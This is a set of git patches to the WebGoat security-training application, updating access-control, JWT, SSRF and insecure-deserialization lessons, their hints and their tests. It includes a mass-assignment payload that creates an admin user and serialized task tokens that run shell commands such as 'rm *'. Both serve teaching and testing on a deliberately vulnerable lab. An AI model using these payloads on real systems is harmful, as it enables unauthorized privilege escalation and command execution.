 access-control.hash.hint8=If you're still looking for hints ... try changing the Content-type header as in the GET request.
 access-control.hash.hint9=You also need to deliver a proper payload for the request (look at how registration works). This should be formatted in line with the content-type you just defined.
-access-control.hash.hint10=You will want to add  WEBGOAT_ADMIN for the user's role. Yes, you'd have to guess/fuzz this in a real-world setting. 
-access-control.hash.hint11=OK, here it is. First, create an admin user ... Change the method to POST, change the content-type to "application/json". And your payload should look something like: {"username":"newUser2","password":"newUser12","matchingPassword":"newUser12","role":"WEBGOAT_ADMIN"}
+access-control.hash.hint10=You will want to add your own username with an admin role. Yes, you'd have to guess/fuzz this in a real-world setting.
+access-control.hash.hint11=OK, here it is. First, create an admin user ... Change the method to POST, change the content-type to "application/json". And your payload should look something like: {"username":"newUser2","password":"newUser12","admin": "true"}
 access-control.hash.hint12=Now log in as that user and bring up WebGoat/users. Copy your hash and log back in to your original account and input it there to get credit.
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-03-users.adoc b/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-03-users.adoc
index 739f15dbf..96afc21db 100644
--- a/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-03-users.adoc
+++ b/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-03-users.adoc
@@ -12,4 +12,4 @@ It will likely take multiple steps and multiple attempts to get this one:
 - You'll need to do some guessing too.
 - You may need to use another browser/account along the way.
 
-Start with the information you already gathered (hidden menu items) to see if you can pull the list of users and then provide the 'Hash' for your user account.
\ No newline at end of file
+Start with the information you already gathered (hidden menu items) to see if you can pull the list of users and then provide the 'hash' for Jerry's account.
\ No newline at end of file
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-04-users-fixed.adoc b/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-04-users-fixed.adoc
new file mode 100644
index 000000000..50f1af292
--- /dev/null
+++ b/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-04-users-fixed.adoc
@@ -0,0 +1,5 @@
+== The company fixed the problem, right?
+
+The company found out the endpoint was a bit too open, they made an emergency fixed and not only admin users can list all users.
+
+Start with the information you already gathered (hidden menu items) to see if you can pull the list of users and then provide the 'hash' for Jerry's account.
diff --git a/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/DisplayUserTest.java b/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/DisplayUserTest.java
index 2b10d7b75..a4bf62910 100644
--- a/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/DisplayUserTest.java
+++ b/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/DisplayUserTest.java
@@ -22,23 +22,22 @@
 
 package org.owasp.webgoat.missing_ac;
 
+import org.assertj.core.api.Assertions;
 import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.mockito.junit.jupiter.MockitoExtension;
-import org.owasp.webgoat.users.WebGoatUser;
 
-@ExtendWith(MockitoExtension.class)
-public class DisplayUserTest {
+import static org.owasp.webgoat.missing_ac.MissingFunctionAC.PASSWORD_SALT_SIMPLE;
+
+class DisplayUserTest {
 
     @Test
-    public void TestDisplayUserCreation() {
-        DisplayUser displayUser = new DisplayUser(new WebGoatUser("user1","password1"));
-        assert(!displayUser.isAdmin());
+    void testDisplayUserCreation() {
+        DisplayUser displayUser = new DisplayUser(new User("user1", "password1", true), PASSWORD_SALT_SIMPLE);
+        Assertions.assertThat(displayUser.isAdmin()).isTrue();
     }
 
     @Test
-    public void TesDisplayUserHash() {
-        DisplayUser displayUser = new DisplayUser(new WebGoatUser("user1","password1"));
-        assert(displayUser.getUserHash().equals("cplTjehjI/e5ajqTxWaXhU5NW9UotJfXj+gcbPvfWWc="));
+    void testDisplayUserHash() {
+        DisplayUser displayUser = new DisplayUser(new User("user1", "password1", false), PASSWORD_SALT_SIMPLE);
+        Assertions.assertThat(displayUser.getUserHash()).isEqualTo("cplTjehjI/e5ajqTxWaXhU5NW9UotJfXj+gcbPvfWWc=");
     }
 }
diff --git a/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionACUsersTest.java b/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionACUsersTest.java
index 0046c6c79..4917549eb 100644
--- a/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionACUsersTest.java
+++ b/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionACUsersTest.java
@@ -28,53 +28,53 @@ import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.Mock;
 import org.mockito.junit.jupiter.MockitoExtension;
-import org.owasp.webgoat.users.UserService;
-import org.owasp.webgoat.users.WebGoatUser;
-import org.springframework.test.util.ReflectionTestUtils;
+import org.owasp.webgoat.plugins.LessonTest;
+import org.owasp.webgoat.session.WebSession;
+import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
-import java.util.ArrayList;
-import java.util.List;
-
+import static org.hamcrest.Matchers.hasSize;
+import static org.hamcrest.Matchers.is;
 import static org.mockito.Mockito.when;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
 
-@ExtendWith(MockitoExtension.class)
-public class MissingFunctionACUsersTest {
-    private MockMvc mockMvc;
-    @Mock
-    private UserService userService;
+class MissingFunctionACUsersTest extends LessonTest {
+
+    @Autowired
+    private MissingFunctionAC ac;
 
     @BeforeEach
-    public void setup() {
-        MissingFunctionACUsers usersController = new MissingFunctionACUsers();
-        this.mockMvc = standaloneSetup(usersController).build();
-        ReflectionTestUtils.setField(usersController,"userService",userService);
-        when(userService.getAllUsers()).thenReturn(getUsersList());
+    void setup() {
+        when(webSession.getCurrentLesson()).thenReturn(ac);
+        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
     }
 
     @Test
-    public void TestContentTypeApplicationJSON () throws  Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/users")
-                .header("Content-type","application/json"))
+    void getUsers() throws Exception {
+        mockMvc.perform(MockMvcRequestBuilders.get("/access-control/users")
+                .header("Content-type", "application/json"))
                 .andExpect(status().isOk())
-                .andExpect(jsonPath("$[0].username", CoreMatchers.is("user1")))
-                .andExpect(jsonPath("$[0].userHash",CoreMatchers.is("cplTjehjI/e5ajqTxWaXhU5NW9UotJfXj+gcbPvfWWc=")))
-                .andExpect(jsonPath("$[1].admin",CoreMatchers.is(true)));
-
+                .andExpect(jsonPath("$[0].username", CoreMatchers.is("Tom")))
+                .andExpect(jsonPath("$[0].userHash", CoreMatchers.is("Mydnhcy00j2b0m6SjmPz6PUxF9WIeO7tzm665GiZWCo=")))
+                .andExpect(jsonPath("$[0].admin", CoreMatchers.is(false)));
     }
 
-    private List<WebGoatUser> getUsersList() {
-        List <WebGoatUser> tempUsers = new ArrayList<>();
-        tempUsers.add(new WebGoatUser("user1","password1"));
-        tempUsers.add(new WebGoatUser("user2","password2","WEBGOAT_ADMIN"));
-        tempUsers.add(new WebGoatUser("user3","password3", "WEBGOAT_USER"));
-        return tempUsers;
+    @Test
+    void addUser() throws Exception {
+        var user = """
+                {"username":"newUser","password":"newUser12","admin": "true"}
+                """;
+        mockMvc.perform(MockMvcRequestBuilders.post("/access-control/users")
+                .header("Content-type", "application/json").content(user))
+                .andExpect(status().isOk());
+
+        mockMvc.perform(MockMvcRequestBuilders.get("/access-control/users")
+                .header("Content-type", "application/json"))
+                .andExpect(status().isOk())
+                .andExpect(jsonPath("$.size()", is(4)));
     }
-
-
-
 }
diff --git a/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHashAdminTest.java b/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHashAdminTest.java
new file mode 100644
index 000000000..637bf1a37
--- /dev/null
+++ b/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHashAdminTest.java
@@ -0,0 +1,44 @@
+package org.owasp.webgoat.missing_ac;
+
+import org.hamcrest.CoreMatchers;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.plugins.LessonTest;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
+
+import static org.mockito.Mockito.when;
+import static org.owasp.webgoat.missing_ac.MissingFunctionAC.PASSWORD_SALT_ADMIN;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+
+class MissingFunctionACYourHashAdminTest extends LessonTest {
+
+    @Autowired
+    private MissingFunctionAC ac;
+
+    @BeforeEach
+    public void setup() {
+        when(webSession.getCurrentLesson()).thenReturn(ac);
+        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+    }
+
+    @Test
+    void solve() throws Exception {
+        var userHash = new DisplayUser(new User("Jerry", "doesnotreallymatter", true), PASSWORD_SALT_ADMIN).getUserHash();
+        mockMvc.perform(MockMvcRequestBuilders.post("/access-control/user-hash-fix")
+                .param("userHash", userHash))
+                .andExpect(status().isOk())
+                .andExpect(jsonPath("$.feedback", CoreMatchers.containsString("Congrats! You really succeeded when you added the user.")))
+                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+    }
+
+    @Test
+    void wrongUserHash() throws Exception {
+        mockMvc.perform(MockMvcRequestBuilders.post("/access-control/user-hash-fix")
+                .param("userHash", "wrong"))
+                .andExpect(status().isOk())
+                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+    }
+}
\ No newline at end of file
diff --git a/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionYourHashTest.java b/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionYourHashTest.java
index f39077ffb..cc07f2e36 100644
--- a/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionYourHashTest.java
+++ b/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionYourHashTest.java
@@ -25,56 +25,40 @@ package org.owasp.webgoat.missing_ac;
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.mockito.Mock;
-import org.mockito.junit.MockitoJUnitRunner;
-import org.mockito.junit.jupiter.MockitoExtension;
-import org.owasp.webgoat.assignments.AssignmentEndpointTest;
-import org.owasp.webgoat.users.UserService;
+import org.owasp.webgoat.plugins.LessonTest;
 import org.owasp.webgoat.users.WebGoatUser;
-import org.springframework.test.util.ReflectionTestUtils;
-import org.springframework.test.web.servlet.MockMvc;
+import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
-import static org.mockito.ArgumentMatchers.any;
 import static org.mockito.Mockito.when;
+import static org.owasp.webgoat.missing_ac.MissingFunctionAC.PASSWORD_SALT_SIMPLE;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
-import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
 
-@ExtendWith(MockitoExtension.class)
-public class MissingFunctionYourHashTest extends AssignmentEndpointTest {
-    private MockMvc mockMvc;
-    private DisplayUser mockDisplayUser;
-
-    @Mock
-    protected UserService userService;
+class MissingFunctionYourHashTest extends LessonTest {
+    @Autowired
+    private MissingFunctionAC ac;
 
     @BeforeEach
-    public void setUp() {
-        MissingFunctionACYourHash yourHashTest = new MissingFunctionACYourHash();
-        init(yourHashTest);
-        this.mockMvc = standaloneSetup(yourHashTest).build();
-        this.mockDisplayUser = new DisplayUser(new WebGoatUser("user", "userPass"));
-        ReflectionTestUtils.setField(yourHashTest, "userService", userService);
-        when(userService.loadUserByUsername(any())).thenReturn(new WebGoatUser("user", "userPass"));
+    public void setup() {
+        when(webSession.getCurrentLesson()).thenReturn(ac);
+        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
     }
 
     @Test
-    public void HashDoesNotMatch() throws Exception {
+    void hashDoesNotMatch() throws Exception {
         mockMvc.perform(MockMvcRequestBuilders.post("/access-control/user-hash")
                 .param("userHash", "42"))
                 .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.containsString("Keep trying, this one may take several attempts")))
                 .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
     }
 
     @Test
-    public void hashMatches() throws Exception {
+    void hashMatches() throws Exception {
         mockMvc.perform(MockMvcRequestBuilders.post("/access-control/user-hash")
-                .param("userHash", "2340928sadfajsdalsNfwrBla="))
+                .param("userHash", "SVtOlaa+ER+w2eoIIVE5/77umvhcsh5V8UyDLUa1Itg="))
                 .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.containsString("Keep trying, this one may take several attempts")))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
     }
 }

From f2f7f36a6d9bca7036c4001b077c767517742bf0 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sat, 6 Nov 2021 17:09:23 +0100
Subject: [PATCH 089/227] Fix typo in hints

The hints for JWT used `jwt` instead of `JWT` which makes it difficult to solve the lesson as the hint actually points someone in the wrong direction.

Resolves: #123
---
 .../jwt/src/main/resources/i18n/WebGoatLabels.properties        | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/webgoat-lessons/jwt/src/main/resources/i18n/WebGoatLabels.properties b/webgoat-lessons/jwt/src/main/resources/i18n/WebGoatLabels.properties
index 92cad6316..70ac7a4a1 100644
--- a/webgoat-lessons/jwt/src/main/resources/i18n/WebGoatLabels.properties
+++ b/webgoat-lessons/jwt/src/main/resources/i18n/WebGoatLabels.properties
@@ -18,7 +18,7 @@ jwt-secret-incorrect-user=The user is {0}, you need to change it to WebGoat
 
 jwt-refresh-hint1=Look at the access log you will find a token there
 jwt-refresh-hint2=The token from the access log is no longer valid, can you find a way to refresh it?
-jwt-refresh-hint3=The endpoint for refreshing a token is 'jwt/refresh/newToken'
+jwt-refresh-hint3=The endpoint for refreshing a token is 'JWT/refresh/newToken'
 jwt-refresh-hint4=Use the found access token in the Authorization: Bearer header and use your own refresh token
 jwt-refresh-not-tom=User is not Tom but {0}, please try again
 

From ab0433bb67c0012ce54b64235d5fa70ad510eb67 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sat, 6 Nov 2021 17:25:17 +0100
Subject: [PATCH 090/227] Fix link and typo

The link pointed to the old OWASP website. Also fixed some typos here and there

Resolves: #1136
---
 .../en/InsecureDeserialization_SimpleExploit.adoc         | 2 +-
 .../src/main/resources/lessonPlans/en/SSRF_Intro.adoc     | 7 +++----
 .../src/main/resources/lessonPlans/en/SSRF_Prevent.adoc   | 8 ++++----
 .../src/main/resources/lessonPlans/en/SSRF_Task2.adoc     | 2 +-
 4 files changed, 9 insertions(+), 10 deletions(-)

diff --git a/webgoat-lessons/insecure-deserialization/src/main/resources/lessonPlans/en/InsecureDeserialization_SimpleExploit.adoc b/webgoat-lessons/insecure-deserialization/src/main/resources/lessonPlans/en/InsecureDeserialization_SimpleExploit.adoc
index 127b85236..45aa89939 100644
--- a/webgoat-lessons/insecure-deserialization/src/main/resources/lessonPlans/en/InsecureDeserialization_SimpleExploit.adoc
+++ b/webgoat-lessons/insecure-deserialization/src/main/resources/lessonPlans/en/InsecureDeserialization_SimpleExploit.adoc
@@ -12,7 +12,7 @@ AcmeObject acme = (AcmeObject)ois.readObject();
 ----
 
 It is expecting an `AcmeObject` object, but it will execute `readObject()` before the casting ocurs.
-If an attacker finds the proper class implementing dangerous operations in `readObject()`, he could serialize that object and force the vulnerable application to performe those actions.
+If an attacker finds the proper class implementing dangerous operations in `readObject()`, he could serialize that object and force the vulnerable application to perform those actions.
 
 === Class included in ClassPath
 
diff --git a/webgoat-lessons/ssrf/src/main/resources/lessonPlans/en/SSRF_Intro.adoc b/webgoat-lessons/ssrf/src/main/resources/lessonPlans/en/SSRF_Intro.adoc
index 62975c72c..b6958d2f6 100755
--- a/webgoat-lessons/ssrf/src/main/resources/lessonPlans/en/SSRF_Intro.adoc
+++ b/webgoat-lessons/ssrf/src/main/resources/lessonPlans/en/SSRF_Intro.adoc
@@ -1,13 +1,12 @@
-
 == Concept
-In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse functionality on the server to read or update internal resources. The attacker can supply or modify a URL which the code running on the server will read or submit data to. And, by carefully selecting the URLs, the attacker may be able to read server configuration such as AWS metadata, connect to internal services like HTTP enabled databases or perform post requests towards internal services which are not intended to be exposed.
+In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse functionality on the server to read or update internal resources. The attacker can supply or modify a URL which the code running on the server will read or submit data to. Moreover, by carefully selecting the URLs, the attacker may read server configuration such as AWS metadata, connect to internal services like HTTP enabled databases, or perform post requests towards internal services that are not intended to be exposed.
 
 == Goals
-In the exercises on the next pages, you need to examine what the browser sends to the server and how you can adjust the request to get other things from the server.
+In the exercises on the following pages, you need to examine what the browser sends to the server and adjust the request to get other things from the server.
 
 == SSRF How-To
 * https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF
 
 == A New Era of SSRF by Orange Tsai
 
-video::D1S-G8rJrEk[youtube, height=480, width=100%]
+video::D1S-G8rJrEk[youtube, height=480, width=100%]
\ No newline at end of file
diff --git a/webgoat-lessons/ssrf/src/main/resources/lessonPlans/en/SSRF_Prevent.adoc b/webgoat-lessons/ssrf/src/main/resources/lessonPlans/en/SSRF_Prevent.adoc
index 67cd12051..fe33884b6 100755
--- a/webgoat-lessons/ssrf/src/main/resources/lessonPlans/en/SSRF_Prevent.adoc
+++ b/webgoat-lessons/ssrf/src/main/resources/lessonPlans/en/SSRF_Prevent.adoc
@@ -1,11 +1,11 @@
-
 == Prevent
 
 To prevent SSRF vulnerabilities in web applications, it is recommended to adhere to the following guidelines:
 
-* Use a whitelist of allowed domains, resources and protocols from where the web server can fetch resources.
+* Use a whitelist of allowed domains, resources, and protocols from where the webserver can fetch resources.
 * Any input accepted from the user should be validated and rejected if it does not match the positive specification expected.
-* If possible, do not accept user input in functions that control where the web server can fetch resources.
+* If possible, do not accept user input in functions that control where the webserver can fetch resources.
 
 == References
-* https://www.owasp.org/index.php/Server_Side_Request_Forgery
\ No newline at end of file
+* https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
+
diff --git a/webgoat-lessons/ssrf/src/main/resources/lessonPlans/en/SSRF_Task2.adoc b/webgoat-lessons/ssrf/src/main/resources/lessonPlans/en/SSRF_Task2.adoc
index e97f7ace5..7f35490fb 100755
--- a/webgoat-lessons/ssrf/src/main/resources/lessonPlans/en/SSRF_Task2.adoc
+++ b/webgoat-lessons/ssrf/src/main/resources/lessonPlans/en/SSRF_Task2.adoc
@@ -1,2 +1,2 @@
-=== Change the request so the server gets information from http://ifconfig.pro
+=== Change the request, so the server gets information from http://ifconfig.pro
 Click the button and figure out what happened.

From 2fbc52e6a2b5e83a3c01340f072eb328b3b2dafd Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Mon, 8 Nov 2021 09:35:54 +0100
Subject: [PATCH 091/227] Remove some unused code

---
 .../resources/html/InsecureDeserialization.html  |  2 --
 .../src/main/resources/js/credentials.js         |  6 ------
 .../src/test/resources/logback-test.xml          | 16 ----------------
 3 files changed, 24 deletions(-)
 delete mode 100755 webgoat-lessons/insecure-deserialization/src/main/resources/js/credentials.js
 delete mode 100644 webgoat-lessons/insecure-deserialization/src/test/resources/logback-test.xml

diff --git a/webgoat-lessons/insecure-deserialization/src/main/resources/html/InsecureDeserialization.html b/webgoat-lessons/insecure-deserialization/src/main/resources/html/InsecureDeserialization.html
index a52f3ce1e..c0b8d7afa 100755
--- a/webgoat-lessons/insecure-deserialization/src/main/resources/html/InsecureDeserialization.html
+++ b/webgoat-lessons/insecure-deserialization/src/main/resources/html/InsecureDeserialization.html
@@ -23,8 +23,6 @@
         <div class="adoc-content" th:replace="doc:InsecureDeserialization_Task.adoc"></div>
         <div class="attack-container">
             <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
-            <script th:src="@{/lesson_js/credentials.js}"
-                    language="JavaScript"></script>
             <form class="attack-form" accept-charset="UNKNOWN" name="task"
                   method="POST"
                   action="/WebGoat/InsecureDeserialization/task">
diff --git a/webgoat-lessons/insecure-deserialization/src/main/resources/js/credentials.js b/webgoat-lessons/insecure-deserialization/src/main/resources/js/credentials.js
deleted file mode 100755
index b7387c623..000000000
--- a/webgoat-lessons/insecure-deserialization/src/main/resources/js/credentials.js
+++ /dev/null
@@ -1,6 +0,0 @@
-function submit_secret_credentials() {
-    var xhttp = new XMLHttpRequest();
-    xhttp['open']('POST', '#attack/307/100', true);
-	//sending the request is obfuscated, to descourage js reading
-	var _0xb7f9=["\x43\x61\x70\x74\x61\x69\x6E\x4A\x61\x63\x6B","\x42\x6C\x61\x63\x6B\x50\x65\x61\x72\x6C","\x73\x74\x72\x69\x6E\x67\x69\x66\x79","\x73\x65\x6E\x64"];xhttp[_0xb7f9[3]](JSON[_0xb7f9[2]]({username:_0xb7f9[0],password:_0xb7f9[1]}))
-}
\ No newline at end of file
diff --git a/webgoat-lessons/insecure-deserialization/src/test/resources/logback-test.xml b/webgoat-lessons/insecure-deserialization/src/test/resources/logback-test.xml
deleted file mode 100644
index a2aa1f5c1..000000000
--- a/webgoat-lessons/insecure-deserialization/src/test/resources/logback-test.xml
+++ /dev/null
@@ -1,16 +0,0 @@
-<configuration>
-
-  <appender name="STDOUT" class="ch.qos.logback.core.ConsoleAppender">
-    <!-- encoders are assigned the type
-         ch.qos.logback.classic.encoder.PatternLayoutEncoder by default -->
-    <encoder>
-      <pattern>%d{HH:mm:ss.SSS} [%thread] %-5level %logger{36} - %msg%n</pattern>
-    </encoder>
-  </appender>
-  
-  <logger name="org.owasp.webgoat.plugin" level="INFO"/>
-
-  <root level="ERROR">
-    <appender-ref ref="STDOUT" />
-  </root>
-</configuration>
\ No newline at end of file

From 20d7015dff255683ef76252e2bcd7a51a0bc67b8 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Mon, 8 Nov 2021 09:36:17 +0100
Subject: [PATCH 092/227] Move unit test to JUnit 5

---
 .../deserialization/DeserializeTest.java      | 23 ++++++-------------
 1 file changed, 7 insertions(+), 16 deletions(-)

diff --git a/webgoat-lessons/insecure-deserialization/src/test/java/org/owasp/webgoat/deserialization/DeserializeTest.java b/webgoat-lessons/insecure-deserialization/src/test/java/org/owasp/webgoat/deserialization/DeserializeTest.java
index 35ba51976..9e98af7d1 100644
--- a/webgoat-lessons/insecure-deserialization/src/test/java/org/owasp/webgoat/deserialization/DeserializeTest.java
+++ b/webgoat-lessons/insecure-deserialization/src/test/java/org/owasp/webgoat/deserialization/DeserializeTest.java
@@ -16,47 +16,43 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
 import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
 
 @ExtendWith(MockitoExtension.class)
-public class DeserializeTest extends AssignmentEndpointTest {
+class DeserializeTest extends AssignmentEndpointTest {
 
     private MockMvc mockMvc;
 
     private static String OS = System.getProperty("os.name").toLowerCase();
 
     @BeforeEach
-    public void setup() {
+    void setup() {
         InsecureDeserializationTask insecureTask = new InsecureDeserializationTask();
         init(insecureTask);
         this.mockMvc = standaloneSetup(insecureTask).build();
     }
 
     @Test
-    public void success() throws Exception {
+    void success() throws Exception {
         if (OS.indexOf("win") > -1) {
             mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
-                    .header("x-request-intercepted", "true")
                     .param("token", SerializationHelper.toString(new VulnerableTaskHolder("wait", "ping localhost -n 5"))))
                     .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(true)));
         } else {
             mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
-                    .header("x-request-intercepted", "true")
                     .param("token", SerializationHelper.toString(new VulnerableTaskHolder("wait", "sleep 5"))))
                     .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(true)));
         }
     }
 
     @Test
-    public void fail() throws Exception {
+    void fail() throws Exception {
         mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
-                .header("x-request-intercepted", "true")
                 .param("token", SerializationHelper.toString(new VulnerableTaskHolder("delete", "rm *"))))
                 .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(false)));
     }
 
     @Test
-    public void wrongVersion() throws Exception {
+    void wrongVersion() throws Exception {
         String token = "rO0ABXNyADFvcmcuZHVtbXkuaW5zZWN1cmUuZnJhbWV3b3JrLlZ1bG5lcmFibGVUYXNrSG9sZGVyAAAAAAAAAAECAANMABZyZXF1ZXN0ZWRFeGVjdXRpb25UaW1ldAAZTGphdmEvdGltZS9Mb2NhbERhdGVUaW1lO0wACnRhc2tBY3Rpb250ABJMamF2YS9sYW5nL1N0cmluZztMAAh0YXNrTmFtZXEAfgACeHBzcgANamF2YS50aW1lLlNlcpVdhLobIkiyDAAAeHB3DgUAAAfjCR4GIQgMLRSoeHQACmVjaG8gaGVsbG90AAhzYXlIZWxsbw";
         mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
-                .header("x-request-intercepted", "true")
                 .param("token", token))
                 .andExpect(status().isOk())
                 .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("insecure-deserialization.invalidversion"))))
@@ -64,27 +60,22 @@ public class DeserializeTest extends AssignmentEndpointTest {
     }
 
     @Test
-    public void expiredTask() throws Exception {
+    void expiredTask() throws Exception {
         String token = "rO0ABXNyADFvcmcuZHVtbXkuaW5zZWN1cmUuZnJhbWV3b3JrLlZ1bG5lcmFibGVUYXNrSG9sZGVyAAAAAAAAAAICAANMABZyZXF1ZXN0ZWRFeGVjdXRpb25UaW1ldAAZTGphdmEvdGltZS9Mb2NhbERhdGVUaW1lO0wACnRhc2tBY3Rpb250ABJMamF2YS9sYW5nL1N0cmluZztMAAh0YXNrTmFtZXEAfgACeHBzcgANamF2YS50aW1lLlNlcpVdhLobIkiyDAAAeHB3DgUAAAfjCR4IDC0YfvNIeHQACmVjaG8gaGVsbG90AAhzYXlIZWxsbw";
         mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
-                .header("x-request-intercepted", "true")
                 .param("token", token))
                 .andExpect(status().isOk())
                 .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("insecure-deserialization.expired"))))
                 .andExpect(jsonPath("$.lessonCompleted", is(false)));
     }
 
-
     @Test
-    public void checkOtherObject() throws Exception {
+    void checkOtherObject() throws Exception {
         String token = "rO0ABXQAVklmIHlvdSBkZXNlcmlhbGl6ZSBtZSBkb3duLCBJIHNoYWxsIGJlY29tZSBtb3JlIHBvd2VyZnVsIHRoYW4geW91IGNhbiBwb3NzaWJseSBpbWFnaW5l";
         mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
-                .header("x-request-intercepted", "true")
                 .param("token", token))
                 .andExpect(status().isOk())
                 .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("insecure-deserialization.stringobject"))))
                 .andExpect(jsonPath("$.lessonCompleted", is(false)));
     }
-
-
 }
\ No newline at end of file

From 5bf33db78f5fbdb40752760ce5055eb6bfff1e7d Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Mon, 8 Nov 2021 09:37:13 +0100
Subject: [PATCH 093/227] Remove obsolete hints

---
 .../src/main/resources/i18n/WebGoatLabels.properties           | 3 ---
 1 file changed, 3 deletions(-)

diff --git a/webgoat-lessons/insecure-deserialization/src/main/resources/i18n/WebGoatLabels.properties b/webgoat-lessons/insecure-deserialization/src/main/resources/i18n/WebGoatLabels.properties
index 8d76b6d61..b4e5e498b 100755
--- a/webgoat-lessons/insecure-deserialization/src/main/resources/i18n/WebGoatLabels.properties
+++ b/webgoat-lessons/insecure-deserialization/src/main/resources/i18n/WebGoatLabels.properties
@@ -1,8 +1,5 @@
 insecure-deserialization.title=Insecure Deserialization
 
-insecure-deserialization.intercept.success=Dangerous object received!
-insecure-deserialization.intercept.failure=Try again
-
 insecure-deserialization.invalidversion=The serialization id does not match. Probably the version has been updated. Let's try again.
 insecure-deserialization.expired=The task is not executable between now and the next ten minutes, so the action will be ignored. Maybe you copied an old solution? Let's try again.
 insecure-deserialization.wrongobject=That is not the VulnerableTaskHolder object. Good try! because the code is not checking this after running the readObject(). Let's try again with the right object.

